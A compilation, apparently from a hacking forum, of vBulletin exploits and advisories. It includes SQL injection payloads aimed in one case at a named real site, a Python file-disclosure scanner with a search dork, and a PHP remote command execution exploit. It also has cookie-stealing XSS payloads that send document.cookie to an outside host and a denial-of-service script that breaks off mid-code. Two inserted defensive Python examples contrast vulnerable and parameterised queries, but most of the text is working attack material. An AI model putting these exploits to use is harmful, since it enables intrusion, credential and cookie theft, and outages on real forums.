[~]70 ALL ARAB!AN HACKER 3X3PT LAM3RZ
  
[~] spechial thanks ab0 mohammed XP_10 h4CK3R JASM!c0prA MARWA N0RHAN S4R4
  
[?]spechial SupP0RTMY M!ND ;) & dookie2000ca & ((OFFsec))

[?]
4r48!4n.!nforma7!0N.53cur!7y ---> ((r3d D3v!L))--M2Z--DEV!L_Ro07--JUPA
  
[~]spechial FR!ND74M3M
  
[~] !M 4R48!4N 3XPL0!73R.

[~] {[(
D!R 4ll 0R D!E)]};

[~]--------------------------------------------------------------------------------  
 jiko/vBulletin Adsense SQL Injection 

Code:
------------------------------
[»]JIKO
[»]No-exploit.Com
[»]Component of vBulletin
--------------
[»]EXPLOIT
viewpage.php?do=show&id=-1 union select 0,1,2--
viewpage.php?do=show&id=-1 union select 0,user(),2--
-------------------
 
You can select the password and username from the users table of the
vBulletin forum for the admin or any user,
and don't forget the salt is very important.
-------------------
example:
http://www.alahsaa.net/vb/viewpage.php?do=show&id=-1%20union%20select%200,2,3--
 
vBulletin Adsense suffers from a remote SQL injection vulnerability.
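Four of the reports on this page are the same defect in two contexts: calendar.php splices an integer-looking `eventid` straight into the query, and global.php hand-quotes a comma-separated `templatesused` list into an `IN (...)` clause, while the admin-panel search and the Adsense add-on show the UNION technique that exploits either. The example below is added here and is neither vBulletin's code nor any of the authors'; it reproduces both query-building patterns next to their parameterised forms so the difference can be run and observed. SQLite stands in for MySQL so the example needs only the standard library, and every row is constructed sample data (the "hash" is a placeholder string, not a real credential).

```python
import sqlite3

# The advisories target MySQL; SQLite stands in here so the example runs with
# the standard library alone. All rows are constructed sample data.
SCHEMA = """
CREATE TABLE calendar_events (
    eventid INTEGER PRIMARY KEY, userid INTEGER, eventdate TEXT, event TEXT, subject TEXT);
CREATE TABLE user (userid INTEGER PRIMARY KEY, username TEXT, password TEXT, salt TEXT);
CREATE TABLE template (templatesetid INTEGER, title TEXT, template TEXT);
INSERT INTO calendar_events VALUES (14, 2, '2012-04-07', 'Maintenance window', 'Patch day');
INSERT INTO user VALUES (1, 'admin', 'constructed-hash-0000', 'ab12');
INSERT INTO template VALUES (1, 'header', '<div>header</div>');
INSERT INTO template VALUES (1, 'footer', '<div>footer</div>');
INSERT INTO template VALUES (1, 'phpinclude', '');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def event_vulnerable(conn, eventid):
    """Mirror of the calendar.php pattern: the raw request value is spliced into
    the SQL text, so a slot meant for one integer accepts a whole UNION clause."""
    sql = ("SELECT userid, eventdate, event, subject FROM calendar_events "
           "WHERE eventid = %s" % eventid)
    return conn.execute(sql).fetchall()


def event_safe(conn, eventid):
    """Reject anything that is not an integer, then bind it as a parameter."""
    try:
        eid = int(eventid)
    except (TypeError, ValueError):
        return None
    sql = "SELECT userid, eventdate, event, subject FROM calendar_events WHERE eventid = ?"
    return conn.execute(sql, (eid,)).fetchone()


def templates_vulnerable(conn, templatesused):
    """Mirror of the global.php pattern: a comma-separated list is quoted by
    hand, so a value containing a quote rewrites the WHERE clause."""
    quoted = ",".join("'%s'" % name for name in templatesused.split(","))
    sql = ("SELECT template, title FROM template WHERE (title IN (%s)) "
           "AND (templatesetid=-1 OR templatesetid=1)" % quoted)
    return conn.execute(sql).fetchall()


def templates_safe(conn, templatesused):
    """One placeholder per list element; the names never touch the SQL text."""
    names = [name for name in templatesused.split(",") if name]
    if not names:
        return []
    placeholders = ",".join("?" * len(names))
    sql = ("SELECT template, title FROM template WHERE (title IN (%s)) "
           "AND (templatesetid=-1 OR templatesetid=1)" % placeholders)
    return conn.execute(sql, names).fetchall()


if __name__ == "__main__":
    db = make_db()
    probe = "14 union SELECT userid, username, password, salt FROM user"
    print("vulnerable:", event_vulnerable(db, probe))
    print("safe:      ", event_safe(db, probe))
    print("vulnerable list:", templates_vulnerable(db, "x') OR 1=1) --"))
    print("safe list:      ", templates_safe(db, "x') OR 1=1) --"))
```

Note that the integer case needs both halves of the fix: casting alone would also have stopped the UNION, but binding is what keeps the query correct if the column type ever changes, and it is the only option for the string-list case, where there is no type to cast to.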

TinKode/vBulletin File Disclosure Exploit 

Python code:
#! /usr/bin/env python3.1
#
################################################################
#                ____        _ _      _   _ (validator.php)    #
#               |  _ \      | | |    | | (_)                   #
#         __   _| |_) |_   _| | | ___| |_ _ _ __               #
#         \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              #
#          \ V /| |_) | |_| | | |  __/ |_| | | | |             #
#           \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             #
#                                   @expl0it...                #
################################################################
#       [ vBulletin Files / Directories Full Disclosure ]      #
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   #
#           [ Greetz: insecurity.ro, darkc0de.com ]            #
################################################################
#                                                              #
#                  Special thanks for: cmiN                    #
#                  www.TinKode.BayWords.com                    #
################################################################

  
import os, sys, urllib.request, urllib.parse, threading


def main():
    logo = """
\t |---------------------------------------------------------------|
\t |                 ____        _ _      _   _     (TM)           |
\t |                |  _ \      | | |    | | (_)                   |
\t |          __   _| |_) |_   _| | | ___| |_ _ _ __               |
\t |          \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              |
\t |           \ V /| |_) | |_| | | |  __/ |_| | | | |             |
\t |            \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             |
\t |                                                               |
\t |               vBulletin Full Disclosure expl0it               |
\t |                      Written by cmiN                          |
\t |              Vulnerability discovered by TinKode              |
\t |                                                               |
\t |              Dork: intext:"Powered by vBulletin"              |
\t |          Visit: www.insecurity.ro & www.darkc0de.com          |
\t |---------------------------------------------------------------|
"""
    usage = """
         |---------------------------------------------------------------|
         |Usage:  vbfd.py scan http://www.site.com/vB_folder             |
         |        vbfd.py download *.sql -> all                          |
         |        vbfd.py download name.jpg -> one                       |
         |---------------------------------------------------------------|"""
    if sys.platform in ("linux", "linux2"):
        clearing = "clear"
    else:
        clearing = "cls"
    os.system(clearing)
    print(logo)
    args = sys.argv
    if len(args) == 3:
        try:
            print("Please wait...")
            if args[1] == "scan":
                extract_parse_save(args[2].strip("/"))
            elif args[1] == "download":
                download_data(args[2])
        except Exception as message:
            print("An error occurred: {}".format(message))
        except:
            print("Unknown error.")
        else:
            print("Ready!")
    else:
        print(usage)
    input()


def extract_parse_save(url):
    print("[+]Extracting content...")
    hurl = url + "/validator.php"
    with urllib.request.urlopen(hurl) as usock:
        source = usock.read().decode()
    print("[+]Finding token...")
    word = "validate('"
    source = source[source.index(word) + len(word):]
    value = source[:source.index("'")]
    print("[+]Obtaining paths...")
    hurl = url + "/validator.php?op={}".format(value)
    with urllib.request.urlopen(hurl) as usock:
        lastk, lastv = None, None
        dictionary = dict()
        for line in usock:
            line = line.decode()
            index = line.find("<td>")
            if index != -1:
                lastk = line[index + 4:line.index("</td>")].strip(" ")
            index = line.find("<strong>")
            if index != -1:
                lastv = line[index + 8:line.index("</strong>")].strip(" ")
            if lastk != None and lastv != None:
                index = lastk.rfind(".")
                if index in (-1, 0):
                    lastk = "[other] {}".format(lastk)
                else:
                    lastk = "[{}] {}".format(lastk[index + 1:], lastk)
                dictionary[lastk] = lastv
                lastk, lastv = None, None
    print("[+]Organizing and saving paths...")
    with open("vBlogs.txt", "w") as fout:
        fout.write(url + "\n")
        keys = sorted(dictionary.keys())
        for key in keys:
            fout.write("{} ({})\n".format(key, dictionary[key]))


def download_data(files):
    print("[+]Searching and downloading files...")
    mthreads = 50
    with open("vBlogs.txt", "r") as fin:
        url = fin.readline().strip("\n")
        if files.find("*") == -1:
            hurl = url + "/" + files.strip("/")
            Download(hurl).start()
        else:
            ext = files[files.rindex(".") + 1:]
            for line in fin:
                pieces = line.strip("\n").split(" ")
                if pieces[0].count(ext) == 1:
                    upath = pieces[1]
                    hurl = url + "/" + upath.strip("/")
                    while threading.active_count() > mthreads:
                        pass
                    Download(hurl).start()
    while threading.active_count() > 1:
        pass


class Download(threading.Thread):

    def __init__(self, url):
        threading.Thread.__init__(self)
        self.url = url

    def run(self):
        try:
            with urllib.request.urlopen(self.url) as usock:
                data = usock.read()
                uparser = urllib.parse.urlparse(usock.geturl())
                pieces = uparser.path.split("/")
                fname = pieces[len(pieces) - 1]
                with open(fname, "wb") as fout:
                    fout.write(data)
        except:
            pass


if __name__ == "__main__":
    main()
vBulletin remote file disclosure exploit. Written in Python.

James Bercegay/vBulletin Search UI SQL Injection

Code:
vBulletin "Search UI" SQL Injection: Take Two
 
It looks like someone has found another SQL Injection bug in the vBulletin "Search UI". After taking a quick look @ the bug, I have determined it to be exploitable, pre auth.
 
The actual SQL Injection lies within the add_advanced_search_filters() function. This is due to vBulletin not sanitizing the "messagegroupid" and "categoryid" arrays before implode()'ing them directly into a SQL query.
 
Exploiting this issue is fairly straightforward, but is pretty much a blind SQL Injection as far as I can tell in the small amount of time I have looked at it. However, using the methods outlined here, one can easily extract data at the expense of possibly tipping off the database admin. This is because vBulletin displays the verbose SQL query within HTML comments whenever displaying an SQL error screen. (Even for non-authenticated users)
 
 
Proof of concept:
 
POST /search.php?do=process HTTP/1.1  
Host: 127.0.0.1  
Content-Type: application/x-www-form-urlencoded  
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*  
 
 
The above post query will successfully display the password hash for the userid=1 within the comments of the SQL error page used by vBulletin, as seen in the example below.
 
<!--  
Database error in vBulletin 4.1.4:  
Invalid SQL:  
                         SELECT socialgroupcategory.title  
                         FROM socialgroupcategory AS socialgroupcategory  
                         WHERE socialgroupcategory.socialgroupcategoryid IN (-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*);  
MySQL Error  : Duplicate entry '4c62730e24e31ab9a0b8229a7ff72836:1' for key 'group_key'  
Error Number : 1062  
Request Date : Wednesday, July 20th 2011 @ 10:24:59 PM  
Error Date  : Wednesday, July 20th 2011 @ 10:24:59 PM  
Script    : http://127.0.0.1/search.php?do=process  
Referrer   :   
IP Address  : 127.0.0.1  
Username   : Unregistered  
Classname   : vB_Database  
MySQL Version :   
-->  
 
 
And of course if you prefer to exploit this in a more stealthy manner, there is always a blind SQL Injection approach using timed BENCHMARK() queries, etc. that will likely work for you.
vBulletin suffers from a Search UI remote SQL injection vulnerability. Proof of concept code included.
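As an added defender-side example (not the page's or vBulletin's code), the following Python re-creates the shape of the flaw the advisory describes, request array values imploded straight into an IN (...) list, beside a hardened version that validates each id as an integer and binds it as a parameter. The sqlite3 schema is a constructed stand-in for the two tables named in the error dump.

```python
import re
import sqlite3

# Hypothetical re-creation of the vulnerable pattern, not vBulletin's own code.
INT_RE = re.compile(r"^-?\d+$")


def build_query_unsafe(categoryids):
    """Vulnerable shape: like implode(',', $categoryid) dropped into the SQL text."""
    return ("SELECT socialgroupcategory.title FROM socialgroupcategory AS socialgroupcategory "
            "WHERE socialgroupcategory.socialgroupcategoryid IN ("
            + ",".join(categoryids) + ")")


def clean_ids(values):
    """Hardened input handling: every element must be a plain integer literal."""
    cleaned = []
    for v in values:
        s = str(v).strip()
        if not INT_RE.match(s):
            raise ValueError("rejected non-integer id: %r" % s)
        cleaned.append(int(s))
    if not cleaned:
        raise ValueError("empty id list")
    return cleaned


def is_rejected(values):
    """True when the hardened validation refuses the request values."""
    try:
        clean_ids(values)
    except ValueError:
        return True
    return False


def fetch_titles_safe(conn, categoryids):
    """Validated ids are bound as parameters; request text never enters the SQL."""
    ids = clean_ids(categoryids)
    sql = ("SELECT title FROM socialgroupcategory WHERE socialgroupcategoryid IN (%s) "
           "ORDER BY socialgroupcategoryid" % ",".join("?" * len(ids)))
    return [row[0] for row in conn.execute(sql, ids)]


def demo_db():
    """Constructed in-memory schema standing in for the tables named in the advisory."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE socialgroupcategory (socialgroupcategoryid INTEGER, title TEXT)")
    conn.executemany("INSERT INTO socialgroupcategory VALUES (?, ?)",
                     [(1, "General"), (2, "Gaming"), (3, "Support")])
    conn.execute("CREATE TABLE user (userid INTEGER, password TEXT)")
    conn.execute("INSERT INTO user VALUES (1, 'constructed-placeholder-hash')")
    return conn


if __name__ == "__main__":
    conn = demo_db()
    print(fetch_titles_safe(conn, ["3", " 1 "]))
    tainted = ["-99) union select password from user where userid=1 -- /*"]
    print(build_query_unsafe(tainted))        # the request text lands inside the SQL
    print("rejected by hardened path:", is_rejected(tainted))
```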

AL3NDALEEB/vbulletin-3.0.4.txt 

Code:
Exploit:
----------------
http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
 
Conditions:
----------------
1st condition     : $vboptions['showforumusers'] == True , the admin must set
        showforumusers ON in vbulletin options.
 
2nd condition     : $bbuserinfo['userid'] == 0 , you must be a visitor/guest.
 
3rd condition     : $DB_site->fetch_array($forumusers) == True , when you
        visit the forums, it must have at least one user viewing the forum.
 
4th condition     : magic_quotes_gpc must be OFF
 
SPECIAL condition : you must bypass unset($GLOBALS["$_arrykey"]) code in
        init.php by secret array GLOBALS[]=1 ;)))
vBulletin v3.0.4 remote command execution exploit. Takes advantage of a bug in forumdisplay.php.

AL3NDALEEB/vbulletin-3.0.4-2.txt 

PHP code:
<?php /**************************************************************
#
# vbulletin 3.0.x execute command by AL3NDALEEB al3ndaleeb[at]uk2.net
#
# First condition : $vboptions['showforumusers'] == True , the admin must set
# showforumusers ON in vbulletin options.
# Second condition: $bbuserinfo['userid'] == 0 , you must be a visitor/guest .
# Third condition : $DB_site->fetch_array($forumusers) == True , when you
# visit the forums, it must have at least
# one user viewing the forum.
# Fourth condition: magic_quotes_gpc must be OFF
#
# Vulnerable Systems:
# vBulletin version 3.0 up to and including version 3.0.4
#
# Immune systems:
# vBulletin version 3.0.5
# vBulletin version 3.0.6
#
**************************************************************/

if (!(function_exists('curl_init'))) {
    echo "cURL extension required\n";
    exit;
}

if (isset($argv[3])) {
    $url = $argv[1];
    $forumid = intval($argv[2]);
    $command = $argv[3];
} else {
    echo "vbulletin 3.0 > 3.0.4 execute command by AL3NDALEEB al3ndaleeb[at]uk2.net\n\n";
    echo "Usage: ".$argv[0]." <url> <forumid> <command> [proxy]\n\n";
    echo "<url> url to vbulletin site (ex: http://www.vbulletin.com/forum/)\n";
    echo "<forumid> forum id\n";
    echo "<command> command to execute on server (ex: 'ls -la')\n";
    echo "[proxy] optional proxy url (ex: http://proxy.ksa.com.sa:8080)\n\n";
    echo "ex :\n";
    echo "\tphp vb30x.php http://www.vbulletin.com/forum/ 2 \"ls -al\"";
    exit;
}

$proxy = isset($argv[4]) ? $argv[4] : '';

// the _START_/_END_ markers delimit the command output inside the returned page
$action = 'forumdisplay.php?GLOBALS[]=1&f='.$forumid.'&comma=".`echo _START_`.`'.$command.'`.`echo _END_`."';

$ch = curl_init();
if ($proxy) {
    curl_setopt($ch, CURLOPT_PROXY, $proxy);
}
curl_setopt($ch, CURLOPT_URL, $url.'/'.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$res = curl_exec($ch);
curl_close($ch);
$res = substr($res, strpos($res, '_START_') + 7);
$res = substr($res, 0, strpos($res, '_END_'));
echo $res;

?>
vBulletin v3.0 through 3.0.4 remote command execution exploit, written in PHP. Takes advantage of a bug in forumdisplay.php.

Thomas Waldegger/20050917-vbulletin-3.0.8.txt 

Code:
 ---------------------------------------------------
| BuHa Security-Advisory #3     |    Sep 17th, 2005 |
| feat. SePro Bugtraq           |                   |
 ---------------------------------------------------
| Vendor   | vBulletin                              |
| URL      | http://vbulletin.com/                  |
| Version  | <= vBulletin 3.0.9                     |
| Risk     | Moderate (SQL-Injection and            |
|          |           Arbitrary File Upload)       |
 ---------------------------------------------------
 
First of all I want to express my disappointment with the behavior of
the vbulletin.com and vbulletin-germany.com team and the missing
cooperation. We sent them a mail with a list of security issues and they
immediately answered that they were going to look into these bugs. We
never got another mail with information about the problems they fixed;
they also did not inform us about the release of the latest version,
which *should* address all known security problems. So it comes as no
surprise that they failed to fix a lot of moderate security bugs in the
latest version. They did not consider it necessary to release *any*
information about patched security problems in their announcement [1]
for the current version either. Some thanks/credits for our trouble/time
with the audit would have been a nice gesture, but who cares.
 
o Description:
=============
 
vBulletin is a powerful, scalable and fully customizable forums package
for your web site. It has been written using the Web's quickest-growing
scripting language; PHP, and is complemented with a highly efficient
and ultra fast back-end database engine built using MySQL.
 
Visit http://vbulletin.com/ for detailed information.
 
o SQL-Injection: (Fixed in vB 3.0.9)
===============
 
> /joinrequests.php:
POST: <do=processjoinrequests&usergroupid=22&request[[SQL-Injection]]=0>
 
> /admincp/user.php:
GET: <do=find&orderby=username&limitnumber=[SQL-Injection]>
GET: <do=find&orderby=username&limitstart=[SQL-Injection]>
 
> /admincp/usertitle.php:
GET: <do=edit&usertitleid=0XF>
 
> /admincp/usertools.php:
GET: <do=pmuserstats&ids=0XF>
 
o XSS: (Fixed in vB 3.0.9)
=====
 
> /admincp/css.php:
GET: <do=doedit&dostyleid=1&group=[XSS]>
 
> /admincp/index.php:
GET: <redirect=[XSS]>
 
> /admincp/user.php:
GET: <do=emailpassword&email=[XSS]>
 
> /admincp/language.php:
GET: <do=rebuild&goto=[XSS]>
 
> /admincp/modlog.php:
GET: <do=view&orderby=[XSS]>
 
> /admincp/template.php:
GET: <do=colorconverter&hex=[XSS]>
GET: <do=colorconverter&rgb=[XSS]>
GET: <do=modify&expandset=[XSS]>
 
o Arbitrary File Upload:
=======================
 
A user with access to the administrator panel (e.g. a (Co)Administrator) and
the privilege to add avatars/icons/smileys is able to upload arbitrary
files. An attacker is thereby able to execute commands in the context of
the web server.
 
> /admincp/image.php:
POST: <do=upload&table=avatar>
POST: <do=upload&table=icon>
POST: <do=upload&table=smilie>
 
This issue is not addressed in vBulletin 3.0.9.
 
o Unpatched Bugs:
================
 
> /modcp/announcement.php:
POST: <do=update&announcementid=1&start=24-07-05&end=30-07-05
&announcement[0]=[SQL-Injection]>
 
> /modcp/user.php:
GET: <do=avatar&userid=0XF>
 
There are still a lot of security-related bugs in the administrator
panel of the vBulletin software. An authorized user could elevate his
privileges and read sensitive data.
 
> /admincp/admincalendar.php:
POST: <do=update&calendarid=1&calendar[daterange]=1970-2030&
calendar[0]=[SQL-Injection]>
POST: <do=updatemod&moderatorid=1&moderator[calendarid]=0XF>
 
> /admincp/cronlog.php:
POST: <do=doprunelog&cronid=0XF>
POST: <do=prunelog&cronid=0XF>
 
> /admincp/email.php:
POST: <do=makelist&user[usergroupid][0]=[SQL-Injection]>
 
> /admincp/help.php:
POST: <do=doedit&help[script]=1&help[0]=[SQL-Injection]>
 
> /admincp/language.php:
POST: <do=update&rvt[0]=[SQL-Injection]>
 
> /admincp/phrase.php:
POST: <do=completeorphans&keep[0]=[SQL-Injection]>
 
> /admincp/usertools.php:
POST: <do=updateprofilepic>
 
Even a privileged user should not be able to add posts, titles,
announcements etc. with HTML/JavaScript code in them.
 
> Not properly filtered: (XSS)
</admincp/announcement.php>
</admincp/admincalendar.php>
</admincp/bbcode.php>
</admincp/cronadmin.php>
</admincp/email.php?do=genlist>
</admincp/faq.php?do=add>
</admincp/forum.php?do=add>
</admincp/image.php?do=add&table=avatar/icon/smilie>
</admincp/language.php>
</admincp/ranks.php?do=add>
</admincp/replacement.php?do=add>
</admincp/replacement.php?do=edit>
</admincp/template.php?do=addstyle>
</admincp/template.php?do=edit>
</admincp/usergroup.php?do=add>
</admincp/usertitle.php>
 
o Disclosure Timeline:
=====================
 
20 Jul 05 - Security flaws discovered.
29 Jul 05 - Vendor contacted.
09 Sep 05 - Vendor released 'bugfixed' version.
17 Sep 05 - Public release.
 
o Solution:
==========
 
Upgrade to vBulletin 3.0.9 [1] to fix some of the issues mentioned in
this advisory. Maybe the next vBulletin release fixes the still
unpatched security related bugs.
 
o Credits:
=========
 
deluxe <deluxe@security-project.org>
 
---
 
Thomas Waldegger <bugtraq@morph3us.org>
BuHa-Security Community - http://buha.info/board/
 
If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address 'bugtraq@morph3us.org' is more a
spam address than a regular mail address therefore it's possible that I
ignore some mails. Please use the contact details at
http://morph3us.org/ to contact me.
 
Greets fly out to cyrus-tc, destructor, nait, rhy (you Pongo-Pongo king,
eh!1! :oP), trappy and all members of BuHa.
 
Advisory online: http://morph3us.org/advisories/20050917-vbulletin-3.0.8.txt
 
[1] http://www.vbulletin.com/forum/showthread.php?p=961409
 
--
M$ is not the answer. M$ is the question. The answer is NO!!1!
BuHa-Security Community: http://buha.info/board/
 
vBulletin versions 3.0.9 and below suffer from multiple SQL injection, cross site scripting, and arbitrary file upload vulnerabilities. Detailed exploitation provided.

Mr.ThieF/vBulletin VBExperience Cross Site Scripting

Code:
++++++++++++++++++++++++++++++++++++++++
[~] Author : Mr.ThieF <~
 
[~] Contact : Mr.ThieF@yahoo.com <~
 
[~] DorK : inurl:xperience.php
 
[~] Software Link : http://www.vbulletin.org/forum/showthread.php?t=245023
 
[~] Version : 4.x.x - 3.x.x
 
[~] Exploit :
 
http://[site]/[path]/xperience.php?go=ranking&order=asc&sort="><script>alert(1);</script>
 
[~] Example : 
 
http://www.vbaddict.net/xperience.php?go=ranking&order=asc&sort="><script>alert(1);</script>
 
++++++++++++++++++++++++++++++++++++++++
The vBExperience add-on as shipped with vBulletin versions 3.x.x and 4.x.x suffers from a cross site scripting vulnerability.

pokley/vBulletin <= 3.0.6 php Code Injection ( php)

Code:
# Tested on vBulletin Version 3.0.1 /str0ke 
# http://www.xxx.net/misc.php?do=page&template={${system(id)}} 
#
 
# [SCAN Associates Security Advisory]
# http://www.scan-associates.net
 
Proof of concept
================
http://site.com/misc.php?do=page&template={${phpinfo()}}
 
# milw0rm.com [2005-02-22]
ROOT_EGY/vBulletin v 2.3 .* SQL Injection Vulnerability ( php)

Code:
# Title: vbulletin Vulnerability versions 2.3 .* - SQL injection.
# Author: Discovered by ROOT_EGY
# Version: vBulletin Version 2.3
 
===========================================================
                     www.sec-war.com
===========================================================
 
 
Versions 2.3.* are vulnerable to SQL injection in the validation of input data in 'calendar.php'; SQL requests are sent to the server.
For example:
www.server.som/forumpath/calendar.php?s=&action=edit&eventid=14 union (SELECT allowsmilies, public, userid, '0000-0-0 ', version (), userid FROM calendar_events WHERE eventid = 14) order by eventdate
Versions 2.*.* are vulnerable to XSS script-tag injection via the e-mail tag:
[E * MAIL] aaa@aaa.aa » 's =' [/ E * MAIL] 'sss =» i = new Image (); i.src =' http://antichat.ru/cgi-bin/s . jpg? '+ document.cookie; this.sss = null »style = top: expression (eval (this.sss));
 
 
 
===========================================================
 
ROOT_EGY  to connect: r0t@hotmail.es
 
===========================================================
 
Greetz TO : Alnjm33 - Mr.xXx - EgY-Sn!per - red virus - ShOot3r - And All My Friends.
 
===========================================================
ROOT_EGY/vBulletin 3.0.0 XSS Vulnerability ( php)

Code:
# Title: vBulletin 3.0.0 XSS
# Author: Discovered by ROOT_EGY
# Version: vBulletin Version 3.0.0
 
===============================================
              WWW.sec-war.com
===============================================
 
3.0.0 - XSS script injection in the search.php script. In fact, the hole is exploited through a browser.
Example: www.xhh777hhh.som/forumpath//search.php?do=process&showposts=0&query = <script> img = new Image (); img.src = «http://antichat.ru/cgi-bin/s. jpg? »+ document.cookie; </ script>
3.0-3.0.4 - command execution in the forumdisplay.php script through incorrect handling of variables.
For example: www.xhh777hhh.som/forumpath/forumdisplay.php?GLOBALS [] = 1 & f = 2 & comma = ». System ( 'id').»
3.0.3-3.0.9 - XSS script injection in the Status field.
Only admins, for example moderators, can change the status. Here is an example of the exploit code: <body onLoad=img = new Image(); img.src = «http://antichat.ru/cgi-bin/s.jpg?»+document.cookie;>
3.0.9 and 3.5.4 - XSS script injection in the posthash parameter of the newthread.php script.
Here is an example:
www.site.com/forumpath/newthread.php?do=newthread&f=3&subject=1234&WYSIWYG_HTML =% 3Cp% 3E% 3C% 2Fp% 3E & s = & f = 3 & do = postthread & posthash = c8d3fe38b082b6d3381cbee17f1f1aca & poststarttime = '% 2Bimg = new Image (); img. src = «http://antichat.ru/cgi-bin/s.jpg?» + document.cookie;% 2B '& sbutton =% D1% EE% E7% E4% E0% F2% FC +% ED% EE% E2 % F3% FE +% F2% E5% EC% F3 & parseurl = 1 & disablesmilies = 1 & emailupdate = 3 & postpoll = yes & polloptions = 1234 & openclose = 1 & stickunstick = 1 & iconid = 0
 
===============================================
 
ROOT_EGY  to connect: r0t@hotmail.es
 
===============================================
 
Greetz TO : Alnjm33 - Mr.xXx - EgY-Sn!per - red virus - ShOot3r - And All My Friends.
 
===============================================
ROOT_EGY/vBulletin v3.5.2 XSS Vulnerabilities ( php)

Code:
# Title: vBulletin Version 3.5.2 - Introduction XSS scripting
# Author: Discovered by ROOT_EGY
# Version: vBulletin Version 3.5.2
 
===============================================
              WWW.sec-war.com
===============================================
 
3.5.2 - XSS script injection
The vulnerability is in the «title» field of the «calendar.php» script.
Example:
TITLE :---> Test <script> img = new Image (); img.src = «http://antichat.ru/cgi-bin/s.jpg?» + Document.cookie; </ script>
BODY :----> No matter
OTHER OPTIONS: -> No matter
For it all to work, go to the calendar, create a new event, put <script> img = new Image (); img.src = «http://antichat.ru/cgi-bin/s.jpg?» + Document. cookie; </ script> in the title, then take the link to our event and show it to whoever we want to steal a cookie from.
3.5.3 - XSS script injection in the «Email Address» field of the «Edit Email & Password» module.
Example:
 
www.server.som/forumpath/profile.php?do=editpassword
pass: your pass
email: vashe@milo.com "> <script> img = new Image (); img.src =« http://antichat.ru/cgi-bin/s.jpg? »+ document.cookie; </ script> . nomatt
Note about length limitation
****
forum / profile.php? do = editoptions
Receive Email from Other Members = yes
****
www.server.com/forumpath/sendmessage.php?do=mailmember&u = (your id)
In the email write vashe@milo.com "> <script> img = new Image (); img.src =« http://antichat.ru/cgi-bin/s.jpg? »+ Document.cookie; </ script>. nomatt. Once saved, it is important to make the email option visible to all. Then send someone www.xhh777hhh.som/forumpath/sendmessage.php?do=mailmember&u = (your id) and get a cookie at our sniffer address.
 
3.5.4 - Database dump
The vulnerability is in the upgrade_301.php script in the 'install' directory.
Example: server.com/forumpath/install/upgrade_301.php?step=SomeWord
 
3.5.4 - XSS script injection
The vulnerability is in the url parameter of the inlinemod.php script.
Example: www.server.com/forumpath/inlinemod.php?do=clearthread&url=lala2% 0d% 0aContent-Length:% 2033% 0d% 0a% 0d% 0a <html> Hacked! </ Html>% 0d% 0a% 0d% 0a
 
===============================================
 
ROOT_EGY  to connect: r0t@hotmail.es
 
===============================================
 
Greetz TO : Alnjm33 - Mr.xXx - EgY-Sn!per - red virus - ShOot3r - And All My Friends.
 
===============================================
FormatXformat/Vbulletin Blog 4.0.2 Title XSS Vulnerability ( php)

Code:
Vbulletin Blog 4.0.2 XSS Vulnerability
 
Author: FormatXformat
Version: Vbulletin 4.0.2
 
 
Dork:
Powered by vBulletin™  Version 4.0.2 Copyright © 2010 vBulletin Solutions, Inc. All rights reserved.
 
 
The script is affected by a permanent XSS vulnerability, so you can put in malicious JavaScript code
 
<script>alert('put this script in title')</script>
<meta http-equiv='Refresh' content='0;URL=http://db-exploit.com'>
 
1st, register
 
Go to the Blogs page
 
Create New Post
 
Inject your JavaScript into the Title box
 
You must go back to the Main page to see this XSS effect.
 
 
 
Greets: Neo, Sa3id, All Tkurd.net Members
Andhra Hackers/vBulletin "Cyb - Advanced Forum Statistics" DOS ( php)

Code:
# Exploit Title: vBulletin "Cyb - Advanced Forum Statistics" DOS
# Date: 10-4-2010
# Author: Andhra Hackers
# Software Link:
# Version: Web Application
# Tested on: Apache/Unix
# CVE : [if exists]
# Code :
 
 
PHP crashes have existed for a long time, and several issues have been responsible for them.
1) The PHP pack() function bug has been around for a long time: if PHP tries to allocate more memory than is generally allocated to a PHP function, the request is terminated and PHP exits/crashes; this might even put a huge load on the server.
 
2) PHP memory allocation is configured via the php.ini file of the PHP installation, so if we could make PHP try to load more memory than it can handle, then we could possibly crash PHP or even the server by causing huge CPU usage.
 
3) A vulnerability exists in the vBulletin add-on "Cyb - Advanced Forum Statistics" in the misc.php file, show=latestposts&vsacb_resnr=, where the application loads all the latest 'n' posts
depending on the (vsacb_resnr=n) value. As the number of posts "vsacb_resnr" is user specified, that means we could make vBulletin load a huge amount of data from the DB, causing it to run out of memory and crash PHP; the huge load may crash the hosting Apache as well, and it won't be able to recover easily.
 
Attached is exploit code which could easily crash a vBulletin installation that has the "Cyb - Advanced Forum Statistics" add-on installed.
Either you could use the attached exploit code to DoS the server or you could simply go to the vulnerable page and
send simultaneous requests by refreshing the page.
 
 
An attacker could exploit this issue to crash the installed PHP, and the crash might DoS the entire server for hours, or the attacker will be able to
download php files from the server.
 
A quick fix for this is to modify the php.ini config file and increase the PHP allocated memory to a higher value.
 
 
Exploit:
import urllib,urllib2,re
print "####################################"
print "#[+]ICW 0-day Domain Crasher #"
print "#[+] Exploit found by Yash [ICW] #"
print "#[+] Exploit Coded by FB1H2S [ICW] #"
print "#[+] Care-Taker d4rk-blu [ICW] #"
print "#[+] Indian Cyber Warriors #"
print "####################################\n"
print "Enter Domain Adress:"
domain=raw_input("[+]Ex: www.site.com<http://www.site.com>:")
url ='http://'+domain+'/misc.php?show=latestposts&vsacb_resnr=10000000'
res = urllib.urlopen(url).read(200)
# the PHP "Allowed memory size of N bytes exhausted" message reveals the limit
phpmem= re.findall('of (.*?)bytes.*?',res)
bytes=int(phpmem[0])
mb=bytes/1048576
print '[+]Server php memmory is:'+str(mb)+' MB'
print "[+]Enter the No of request you wann send:"
